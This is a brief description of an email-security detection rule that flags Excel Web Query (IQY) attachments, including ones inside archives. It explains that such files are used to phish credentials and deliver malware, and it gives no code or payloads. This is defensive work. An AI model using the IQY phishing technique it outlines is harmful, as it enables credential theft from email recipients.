This detection rule targets Excel Web Query files (IQY) which can be used for phishing and malware delivery by coercing users into submitting their credentials to attacker-controlled web servers. The rule recursively scans files and archives to detect the presence of IQY files in email attachments or in commonly used archive file types. An IQY file has the potential to execute malicious requests and retrieve sensitive information, making it a critical asset for cyber attackers. The detection mechanism is designed to analyze various attachments based on file extensions, specifically focusing on direct IQY files or potentially malicious files housed within compressed archives. By identifying these files, the rule aims to prevent credential theft and reduce the risk of malware spreading across the network. This high-severity detection is crucial for organizations looking to bolster their defenses against these types of social engineering attacks.